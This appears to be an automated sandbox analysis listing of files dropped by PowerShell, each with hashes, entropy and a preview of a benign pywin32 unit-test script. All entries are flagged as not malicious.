                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# Some tests of the win32security sspi functions...# Stolen from Roger's original test_sspi.c, a version of which is in "Demos"..# See also the other SSPI demos...import unittest....import sspi..import sspicon..import win32api..import win32security..from pywin32_testutil import TestSkipped, testmain......# It is quite likely that the Kerberos tests will fail due to not being..# installed. The NTLM tests do *not* get the same behaviour as they should..# always be there...def applyHandlingSkips(func, *args):.. try:.. return func(*args).. except win32api.error as exc:.. if exc.winerror in [.. sspicon.SEC_E_NO_CREDENTIALS,.. sspicon.SEC_E_NO_AUTHENTICATING_AUTHORITY,.. ]:.. raise TestSkipped(exc).. raise......class TestSSPI(unittest.TestCase):.. def assertRaisesHRESULT(self, hr, func, *args):.. try:.. func(*args).. raise AssertionError(f"expecting {hr} failure").. except win32security
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):10007
                                                                                                                                                                                                            Entropy (8bit):4.7967228040734975
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:TkcQiTHhyZ40DrdX2KUUYuwBKBYBKtQIH6MA:TxYF2rDuawiIqt
                                                                                                                                                                                                            MD5:618828F95C0EDA100B1BAA4DFCE099C8
                                                                                                                                                                                                            SHA1:FD6F145AF740DD7228F250C2C19B6E8924E718AF
                                                                                                                                                                                                            SHA-256:B9DE09B268816E933A96B478F2B0A4E28F42E556E6762389207122FC43C4E25F
                                                                                                                                                                                                            SHA-512:D427EF237682A79FAB48DA984B3DA5C798B87988FCED2AB762F26E4EEF30335A4F7E5875EAB3A826F350AFC7B213716598AC85F0BA8270FC7242259C9541A100
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# General test module for win32api - please add some :)....import datetime..import os..import sys..import tempfile..import time..import unittest....import win32api..import win32con..import win32event..import winerror..from pywin32_testutil import TestSkipped......class CurrentUserTestCase(unittest.TestCase):.. def testGetCurrentUser(self):.. domain = win32api.GetDomainName().. if domain == "NT AUTHORITY":.. # Running as a service account, so the comparison will fail.. raise TestSkipped("running as service account").. name = f"{domain}\\{win32api.GetUserName()}".. self.assertEqual(name, win32api.GetUserNameEx(win32api.NameSamCompatible))......class TestTime(unittest.TestCase):.. def testTimezone(self):.. # GetTimeZoneInformation.. rc, tzinfo = win32api.GetTimeZoneInformation().. if rc == win32con.TIME_ZONE_ID_DAYLIGHT:.. tz_str = tzinfo[4].. tz_time = tzinfo[5].. else:..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2015
                                                                                                                                                                                                            Entropy (8bit):4.636328955187088
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:OYJneZQN0EGteZQhGsEGd93sgyKVbSgj0BbVx+b1zhm93DKVbHNrqaBYlpe:OOneEGteOGRGd93spu0BiK93+ByA
                                                                                                                                                                                                            MD5:7B3731D1383EA9ED904A31C3AF4302A8
                                                                                                                                                                                                            SHA1:B0310F9C410FAEE5C314F2B389C3915E0D3CE1D3
                                                                                                                                                                                                            SHA-256:197B9DB4F63F6B0BB369D9BFCC3AFC4357950A8C1014C82E0E7A3C8698BFCD55
                                                                                                                                                                                                            SHA-512:B1C80D9D086D14EA9BF64364585ED998C86335F8509F4CB9A5DEAC67BC4CA4C3C09A924CCA43CC42925DA04CEEEB94CCA3DA4D567F11B855B4FDFAF859335A40
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# tests for win32gui..import unittest....import win32clipboard......class TestGetSetClipboardData(unittest.TestCase):.... def copyData(self, data, format_):.. win32clipboard.OpenClipboard().. ret = None.. try:.. win32clipboard.SetClipboardData(format_, data).. ret = win32clipboard.GetClipboardData(format_).. finally:.. win32clipboard.CloseClipboard().. return ret.... def copyText(self, data, format_):.. win32clipboard.OpenClipboard().. ret = None.. try:.. win32clipboard.SetClipboardText(data, format_).. ret = win32clipboard.GetClipboardData(format_).. finally:.. win32clipboard.CloseClipboard().. return ret.... def test_data(self):.. test_data = {.. "Dummy str": win32clipboard.CF_UNICODETEXT,.. b"Dummy bytes text": win32clipboard.CF_TEXT,.. b"Dummy\x00\xFF bytes": win32clipboard.CF_DIB,.. }..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3241
                                                                                                                                                                                                            Entropy (8bit):4.501124065062478
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:ldvWHvYR5uLiwXlmMXsXwUtNDAsV04exrmRqu:3IY
                                                                                                                                                                                                            MD5:9278AD2182E1D04924662DA1592BD70D
                                                                                                                                                                                                            SHA1:B205A5D6066385E0A3668D0E256895454C2AE7CF
                                                                                                                                                                                                            SHA-256:E576BD6600560D97AADEADB2CFF22148024C1C045CFB11905E9F4151F2025D95
                                                                                                                                                                                                            SHA-512:8F2D07CF199994637012E4D8F085E65EF8B11532A7DF85F7BBC027F8DDF5F1CA66698528B1287C370FBAFD66648EE2095CE6296F45F661517C0364BBD8883D50
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:import copy..import unittest....import win32cred......class TestCredFunctions(unittest.TestCase):.... def setUp(self):.. self.flags = 0.. self.dummy_cred = {.. "TargetName": "DumyyUser",.. "Type": win32cred.CRED_TYPE_GENERIC,.. "Flags": self.flags,.. }.... def create_dummy_cred(self):.. cred = copy.deepcopy(self.dummy_cred).. cred.update(.. {.. "Persist": win32cred.CRED_PERSIST_SESSION,.. }.. ).. try:.. win32cred.CredWrite(cred, self.flags).. except Exception as e:.. print(e).... def is_dummy_cred(self):.. return (.. len(.. [.. e.. for e in win32cred.CredEnumerate().. if e["TargetName"] == self.dummy_cred["TargetName"].. ].. ).. == 1.. ).... def test_creddelete(self):.. self.create_dummy_cr
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4521
                                                                                                                                                                                                            Entropy (8bit):4.750747229398631
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:yMfvJokvyeHftZ9gamOqHut4I2yXFRM5DIg6NdLDcg4LxLpty5NE3PVm:yMfvJZ53Ye91SmjV4FHyfwdm
                                                                                                                                                                                                            MD5:44A20DF32D64E074DEF8D852939E801A
                                                                                                                                                                                                            SHA1:3C4869D4876DA10A221201AE230CF958170DB46B
                                                                                                                                                                                                            SHA-256:6DFE06C48B9ADA4A972B5BE1BA9FA7DFAC1B5A950DE03541C7D1C952737D924F
                                                                                                                                                                                                            SHA-512:9697890A12A156D5899C36467A49ED8FCB51F49212869A3979808D755D2787BAC4397DC65D7D4CBEEFD09EFD8F51A7DCE6C2E80EE956B8F65B97C8D289ECB6E1
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# Test module for win32crypt....import contextlib..import unittest..from typing import Any, Iterator....import win32crypt..from pywin32_testutil import TestSkipped, find_test_fixture, testmain..from win32cryptcon import *......class Crypt(unittest.TestCase):.. def testSimple(self):.. data = b"My test data".. entropy = None.. desc = "My description".. flags = 0.. ps = None.. blob = win32crypt.CryptProtectData(data, desc, entropy, None, ps, flags).. got_desc, got_data = win32crypt.CryptUnprotectData(.. blob, entropy, None, ps, flags.. ).. self.assertEqual(data, got_data).. self.assertEqual(desc, got_desc).... def testEntropy(self):.. data = b"My test data".. entropy = b"My test entropy".. desc = "My description".. flags = 0.. ps = None.. blob = win32crypt.CryptProtectData(data, desc, entropy, None, ps, flags).. got_desc, got_data = win32crypt.CryptUnprot
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4487
                                                                                                                                                                                                            Entropy (8bit):4.742508716700867
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:oBGMS0ya12n0iOWK+8UFWJBGUHJqHFRHWpewKLnUW4Lpf1Idwj/2A:OGMS0ya1i0iOWK+8UFWzGOJoFdW3KLn4
                                                                                                                                                                                                            MD5:BE7748A27FCF0B9680DF80BC7E6FA1F9
                                                                                                                                                                                                            SHA1:34F430596CECE9DBF0ED73A1648F5355E1EC4466
                                                                                                                                                                                                            SHA-256:9664DC1AEECF1DC7300B5F2338DAD2ECC764EC344A58598C8B17981965EAFA2A
                                                                                                                                                                                                            SHA-512:F378CFC1CA0DEF67343B6865C9530EA7D1306236F6376F31F6434F23BCBD8CA2E5CA9BE956156EAE320E853D0F9B732E8863D0C44143985AC9F10E57869C552D
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:import unittest....import pywintypes..import win32event......class TestWaitableTimer(unittest.TestCase):.. def testWaitableFire(self):.. h = win32event.CreateWaitableTimer(None, 0, None).. dt = -160 # 160 ns... win32event.SetWaitableTimer(h, dt, 0, None, None, 0).. rc = win32event.WaitForSingleObject(h, 1000).. self.assertEqual(rc, win32event.WAIT_OBJECT_0).... def testCreateWaitableTimerEx(self):.. h = win32event.CreateWaitableTimerEx(.. None,.. None,.. win32event.CREATE_WAITABLE_TIMER_HIGH_RESOLUTION,.. win32event.TIMER_ALL_ACCESS,.. ).. dt = -160 # 160 ns... win32event.SetWaitableTimer(h, dt, 0, None, None, 0).. rc = win32event.WaitForSingleObject(h, 1000).. self.assertEqual(rc, win32event.WAIT_OBJECT_0).... def testWaitableTrigger(self):.. h = win32event.CreateWaitableTimer(None, 0, None).. # for the sake of this, pass a long that doesn't
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):42171
                                                                                                                                                                                                            Entropy (8bit):4.646231012180696
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:dIiqwdjAkgwKC/7d+MDz0zoWCzZOVKSRRL:dIUb7lWCzGB
                                                                                                                                                                                                            MD5:E012BE3DF731757C13E93A07CBEE417F
                                                                                                                                                                                                            SHA1:26105BB319DDBDA4680F5475F3DE426B5EE980DB
                                                                                                                                                                                                            SHA-256:2D6FF97170A71E3AD097C89B7A8123EA4EA283C18EBD3450340641CC2DBE2472
                                                                                                                                                                                                            SHA-512:A1B01AF14D6E67A93AD5B5766216AAB7B1DE021F2FF75E0556203C011C004BAB79CC1EFC907F01391756B56F10BAE7BE6C3FEBCDE2EB9897F12E157A6A0257FB
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:import datetime..import os..import random..import shutil..import socket..import tempfile..import threading..import time..import unittest....import ntsecuritycon..import pywintypes..import win32api..import win32con..import win32event..import win32file..import win32pipe..import win32timezone..import winerror..from pywin32_testutil import TestSkipped, testmain......class TestReadBuffer(unittest.TestCase):.. def testLen(self):.. buffer = win32file.AllocateReadBuffer(1).. self.assertEqual(len(buffer), 1).... def testSimpleIndex(self):.. buffer = win32file.AllocateReadBuffer(1).. buffer[0] = 0xFF.. self.assertEqual(buffer[0], 0xFF).... def testSimpleSlice(self):.. buffer = win32file.AllocateReadBuffer(2).. val = b"\0\0".. buffer[:2] = val.. self.assertEqual(buffer[0:2], val)......class TestSimpleOps(unittest.TestCase):.. def testSimpleFiles(self):.. fd, filename = tempfile.mkstemp().. os.close(fd)..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):7968
                                                                                                                                                                                                            Entropy (8bit):4.379874389889704
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:P3TRUDeBTTvpcVAF9Kiig/tn10v1jJo+vbtwk1vLiDpPY1v8QVJTZ3tA:Pj6DeH3/icn1A1jBpVt+9Qt3VjtA
                                                                                                                                                                                                            MD5:5EE6DFF9B43CBAC04D35A738BA87E3F3
                                                                                                                                                                                                            SHA1:83C9F235C2F58FB49F4843C6274F4400B9853EBC
                                                                                                                                                                                                            SHA-256:48F0123D05D4CCDEAE4BDE3FEDEF1688BDF3E28C5ABCEF96D9B206B5B00AA10D
                                                                                                                                                                                                            SHA-512:A45C53DF380E49E5FE4AA81AB48FC110D41B315DB1A0E76453F1D4A5315B52174E2DEB9558EE394404A48FE3EBD4FF26EB02FAB359244BB3D4EFEDD073A483F7
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# tests for win32gui..import array..import operator..import sys..import unittest....import pywin32_testutil..import pywintypes..import win32api..import win32gui......class TestPyGetString(unittest.TestCase):.. def test_get_string(self):.. # test invalid addresses cause a ValueError rather than crash!.. self.assertRaises(ValueError, win32gui.PyGetString, 0).. self.assertRaises(ValueError, win32gui.PyGetString, 1).. self.assertRaises(ValueError, win32gui.PyGetString, 1, 1)......class TestPyGetMemory(unittest.TestCase):.. def test_ob(self):.. # Check the PyGetMemory result and a bytes string can be compared.. test_data = b"\0\1\2\3\4\5\6".. c = array.array("b", test_data).. addr, buflen = c.buffer_info().. got = win32gui.PyGetMemory(addr, buflen).. self.assertEqual(len(got), len(test_data)).. self.assertEqual(bytes(got), test_data).... def test_memory_index(self):.. # Check we can index into the b
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):9694
                                                                                                                                                                                                            Entropy (8bit):4.594674794225483
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:cC/ENaMAze4zGaMzsT9oIrY8VmXBpgVSJmDpqPknXqcmcULcZcU6Xpc6cUlXicdI:P/saMAz1KaM+29XL0XobXoQXPA
                                                                                                                                                                                                            MD5:4593430D242A62774270C38798D45A16
                                                                                                                                                                                                            SHA1:4606DE35759DDBDDCF548AEDF08F4C08B87EAC04
                                                                                                                                                                                                            SHA-256:1296B041657A35275D6C056CFAACE095E2AA96325E24D6401B18F494715660FE
                                                                                                                                                                                                            SHA-512:27CE5B517B6894089CEAF843641F106BD536DBC30AC8E2AC8AE52F127526774C4E3C5BDCC4B698C50366431B3B2D9802C2B36D7DEDFD4DD1652EDF4AAF42A571
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:import array..import unittest....import pythoncom..import win32con..import win32gui..import win32gui_struct......class TestBase(unittest.TestCase):.. def assertDictEquals(self, d, **kw):.. checked = {}.. for n, v in kw.items():.. self.assertEqual(v, d[n], f"'{n}' doesn't match: {v!r} != {d[n]!r}").. checked[n] = True.. checked_keys = list(checked.keys()).. passed_keys = list(kw.keys()).. checked_keys.sort().. passed_keys.sort().. self.assertEqual(checked_keys, passed_keys)......class TestMenuItemInfo(TestBase):.. def _testPackUnpack(self, text):.. vals = {.. "fType": win32con.MFT_MENUBARBREAK,.. "fState": win32con.MFS_CHECKED,.. "wID": 123,.. "hSubMenu": 1234,.. "hbmpChecked": 12345,.. "hbmpUnchecked": 123456,.. "dwItemData": 1234567,.. "text": text,.. "hbmpItem": 321,.. }.. mii, extras = win
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3119
                                                                                                                                                                                                            Entropy (8bit):4.599871487103514
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:W1GrbmK0WCRGTgWO8sWVFWM+mpnnYB0pU2kX8VIreN82iOW29+OsaHlm:W1GOK8R18sWVFWYpnuf2kWYOW20aHlm
                                                                                                                                                                                                            MD5:AE67A5EFC65DF481D0B9EC5D5C31C0D3
                                                                                                                                                                                                            SHA1:CAC237B21392A80395BD551114ED4EF681614002
                                                                                                                                                                                                            SHA-256:A7C9333132701BD86888BA385660A3A15155FC7C563CB4EFAEA365D4A3BE18FB
                                                                                                                                                                                                            SHA-512:08E9CE8CC0E2092F4B3758CDD70CD65BB642B95FB4A3A454CE4E26EBF19DA75FF1C7449CC264C635E49E1B25339766853387A7D9DF068B3577D6D8698A94FAB5
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:import unittest....import winerror..from pywin32_testutil import TestSkipped, testmain..from win32inet import *..from win32inetcon import *......class CookieTests(unittest.TestCase):.. def testCookies(self):.. data = "TestData=Test".. InternetSetCookie("http://www.python.org", None, data).. got = InternetGetCookie("http://www.python.org", None).. # handle that there might already be cookies for the domain... bits = (x.strip() for x in got.split(";")).. self.assertTrue(data in bits).... def testCookiesEmpty(self):.. try:.. InternetGetCookie("http://site-with-no-cookie.python.org", None).. self.fail("expected win32 exception").. except error as exc:.. self.assertEqual(exc.winerror, winerror.ERROR_NO_MORE_ITEMS)......class UrlTests(unittest.TestCase):.. def testSimpleCanonicalize(self):.. ret = InternetCanonicalizeUrl("foo bar").. self.assertEqual(ret, "foo%20bar").... def te
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):678
                                                                                                                                                                                                            Entropy (8bit):4.34573011579118
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:7Lf5Lfz8WHuCY23aL9xrClXrKfaKEdteP17uCY1FC4hGtfTteNI02pWB:J8WHp3aL9x2JrKfaKEq17U0FUmpe
                                                                                                                                                                                                            MD5:32AF7F0FF666D984C4DE5E8AD7D9B0B4
                                                                                                                                                                                                            SHA1:B15F818B25A3A25B56769567BB64B6FAB9A42185
                                                                                                                                                                                                            SHA-256:C4ADF70A9E72F1611EE91C859AFE53243E3793924D0588F7DC38B0FD042279AC
                                                                                                                                                                                                            SHA-512:1F9BED07CB5C880187141604FD4DEDFCF6ED4F5C42B403BC937259E1E2C23BCA975DED6376C7028A809701EE3FDBA1EF17848DD501B58C564E4F346E2E548974
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:import unittest....import win32net..import win32netcon......class TestCase(unittest.TestCase):.. def testGroupsGoodResume(self, server=None):.. res = 0.. level = 0 # setting it to 1 will provide more detailed info.. while True:.. (user_list, total, res) = win32net.NetGroupEnum(server, level, res).. for i in user_list:.. pass.. if not res:.. break.... def testGroupsBadResume(self, server=None):.. res = 1 # Can't pass this first time round... self.assertRaises(win32net.error, win32net.NetGroupEnum, server, 0, res)......if __name__ == "__main__":.. unittest.main()..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4945
                                                                                                                                                                                                            Entropy (8bit):4.761774327578846
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:j/6vnb6B7kR8d+3LxK9p+3LZK956+3Lo95dd0+3LyA:ob6B7kR8g3LxK9s3LZK9573Lo95HZ3LP
                                                                                                                                                                                                            MD5:F885A747E5C9C39792D39B7582692114
                                                                                                                                                                                                            SHA1:A5724650EECC3D6A36DE9FF16160F36ABBFA704F
                                                                                                                                                                                                            SHA-256:5A07959C02AC804A3BA21B2CCB30B8040F1367E172EDC768A1F557DBB195F1CC
                                                                                                                                                                                                            SHA-512:4FD4B2EC402F21EAA919CC07A640AD812B58A9D8F2DBCB7DFB6151CE5FE43E210072DAAAAC31A0CF41D2A37885714C1C33171DC91774A02B2F1BDEADE939D4E6
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:import threading..import time..import unittest....import pywintypes..import win32con..import win32event..import win32file..import win32pipe..import winerror......class PipeTests(unittest.TestCase):.. pipename = "\\\\.\\pipe\\python_test_pipe".... def _serverThread(self, pipe_handle, event, wait_time):.. # just do one connection and terminate... hr = win32pipe.ConnectNamedPipe(pipe_handle).. self.assertTrue(.. hr in (0, winerror.ERROR_PIPE_CONNECTED), f"Got error code 0x{hr:x}".. ).. hr, got = win32file.ReadFile(pipe_handle, 100).. self.assertEqual(got, b"foo\0bar").. time.sleep(wait_time).. win32file.WriteFile(pipe_handle, b"bar\0foo").. pipe_handle.Close().. event.set().... def startPipeServer(self, event, wait_time=0):.. openMode = win32pipe.PIPE_ACCESS_DUPLEX.. pipeMode = win32pipe.PIPE_TYPE_MESSAGE | win32pipe.PIPE_WAIT.... sa = pywintypes.SECURITY_ATTRIBUTES().. sa
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):705
                                                                                                                                                                                                            Entropy (8bit):4.657796716609016
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:LqDLdRrvfJy/MPoYiSIkYXOQMAmZ2vrfMm5G5VTRZ02pWB:6Rb/1iSIkYXOzZagjpe
                                                                                                                                                                                                            MD5:B0E1CA93A7402F6D810AF4175CAA49BF
                                                                                                                                                                                                            SHA1:F695C996337771419E78774F99D658EC611B12A2
                                                                                                                                                                                                            SHA-256:C6F842C62E7B8B811F3955F71A7FFD98B8E6225ABF3BBF9880CD23A286BBAC4C
                                                                                                                                                                                                            SHA-512:F67E025ADEADC950D0C07D2AA6324DD918706DD413E226B662E76F4D9FB9363ACB726555477E2F0626B23FA83A25EA2CD7E5547EE6799A234086801F2051CF67
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# Tests (scarce) for win32print module....import unittest....import win32print as wprn......class Win32PrintTestCase(unittest.TestCase):.. def setUp(self):.. self.printer_idx = 0.. self.printer_levels_all = list(range(1, 10)).. self.local_printers = wprn.EnumPrinters(wprn.PRINTER_ENUM_LOCAL, None, 1).... def test_printer_levels_read_dummy(self):.. if not self.local_printers:.. print("Test didn't run (no local printers)!").. return.. ph = wprn.OpenPrinter(self.local_printers[self.printer_idx][2]).. for level in self.printer_levels_all:.. wprn.GetPrinter(ph, level)......if __name__ == "__main__":.. unittest.main()..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):433
                                                                                                                                                                                                            Entropy (8bit):4.7500993773184765
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6:N4XhhMXzLX+eYpwtsXrzQCb2WkwsYoKXFfoFvXfa55kXfWUmHkUCRXfWU8Mb2lk4:N7LX+eqb7sYtXqxhCHpCx5bgp+02pWB
                                                                                                                                                                                                            MD5:2CFD669F2741A904CDF893202DE043CF
                                                                                                                                                                                                            SHA1:D34ADCE1000265FCA775022107877152F455D908
                                                                                                                                                                                                            SHA-256:BDA9B91EE8BD1B8F0A86EB742BC68C7FAB05625EFBBAEF506BB755E3EEE158B2
                                                                                                                                                                                                            SHA-512:00A76EA3B16F03F39B173DD318D18202386300F7E229EE45697E9B22EA01986CD328C97B03F61783F4E5631EA3B0C0312002059AC801D698E6054C89888AA285
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""Test win32profile"""....import os..import unittest....import win32profile......class Tester(unittest.TestCase):.. def test_environment(self):.. os.environ["FOO"] = "bar=baz".. env = win32profile.GetEnvironmentStrings().. self.assertIn("FOO", env).. self.assertEqual(env["FOO"], "bar=baz").. self.assertEqual(os.environ["FOO"], "bar=baz")......if __name__ == "__main__":.. unittest.main()..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2533
                                                                                                                                                                                                            Entropy (8bit):4.748072838351773
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:DFh6huMyvh158c99qjaX4C7gYx8qE47kqE7jcg5LoA:hh6huM4b599galg/Ak/7jcgtoA
                                                                                                                                                                                                            MD5:CC1FF6461632022F65DC4C89CC28A916
                                                                                                                                                                                                            SHA1:C4AE459F429FF214E5733A1802F1186CAD7C51A5
                                                                                                                                                                                                            SHA-256:E1D9B9885A0D065F49BFBCCED451844908355192570D4E9CB62359475DB2C135
                                                                                                                                                                                                            SHA-512:A41374D209DC35DD8300E010228568960F15B5E08C3DF5AF5A8F5C501DD9FB1077984991FBE993E727CE057FEF88AF1E3DB2B17C7166384739AC68B65548C19F
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:import os..import tempfile..import unittest....import win32con..import win32rcparser......class TestParser(unittest.TestCase):.. def setUp(self):.. rc_file = os.path.join(os.path.dirname(__file__), "win32rcparser", "test.rc").. self.resources = win32rcparser.Parse(rc_file).... def testStrings(self):.. for sid, expected in (.. ("IDS_TEST_STRING4", "Test 'single quoted' string"),.. ("IDS_TEST_STRING1", 'Test "quoted" string'),.. ("IDS_TEST_STRING3", 'String with single " quote'),.. ("IDS_TEST_STRING2", "Test string"),.. ):.. got = self.resources.stringTable[sid].value.. self.assertEqual(got, expected).... def testStandardIds(self):.. for idc in "IDOK IDCANCEL".split():.. correct = getattr(win32con, idc).. self.assertEqual(self.resources.names[correct], idc).. self.assertEqual(self.resources.ids[idc], correct).... def testTabStop(self):..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):327
                                                                                                                                                                                                            Entropy (8bit):4.60892628562837
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6:SF3sXFoKmTZMXzL8KaicTAxwtsXrzRITFTsDe1XfYaCFAjpH2My:+KzL8KavTGITGD4702pWB
                                                                                                                                                                                                            MD5:FDD771240049400154F42FADBB6BCEB1
                                                                                                                                                                                                            SHA1:1F8D0D8B35BD1638DFDAAD2FD51AA6E4CCBE6A1B
                                                                                                                                                                                                            SHA-256:DE93045E9665CF388CC56FD3953ED67C8D63FBFDE819F4B063D4C1F577DFF8A4
                                                                                                                                                                                                            SHA-512:B702685720C8C2A437006D75088C69E37C7CAF6B61A0533C4E7CE8001EA863FA22060131F8E724B26D64D3A2AE824E623826589A5922DABDF2ABCBD466D40AC6
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# Test module for win32timezone....import doctest..import unittest....import win32timezone......class Win32TimeZoneTest(unittest.TestCase):.. def testWin32TZ(self):.. failed, total = doctest.testmod(win32timezone, verbose=False).. self.assertFalse(failed)......if __name__ == "__main__":.. unittest.main()..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):11665
                                                                                                                                                                                                            Entropy (8bit):4.583594543566584
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:A70QmzaAAw8ZEfvNw9X7RNf4FnpzAS9LjWL8RVX65+GD/fI9IeGT3ZAaESgiO+GV:A/PhJs0b4FpJX6479IenS5x/m3lff
                                                                                                                                                                                                            MD5:E56854E7C0AFE66AA1D05B2ACBDC5585
                                                                                                                                                                                                            SHA1:D8BE94AD69DCCE20D8698A00D094A9638323473D
                                                                                                                                                                                                            SHA-256:1DDF48BC2CAFC0F4E110CF3B90B25E44A4E86BB3E81B143F0938BB856DB95961
                                                                                                                                                                                                            SHA-512:C91C2FDFC46453DDFE0EC850A7DB853CD5B8023F98D958BEED1DE317AF9A748AE5B168CE30C88E4C3941F2F56C056BB38B693988B6B5D02504904D86E29E1D84
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
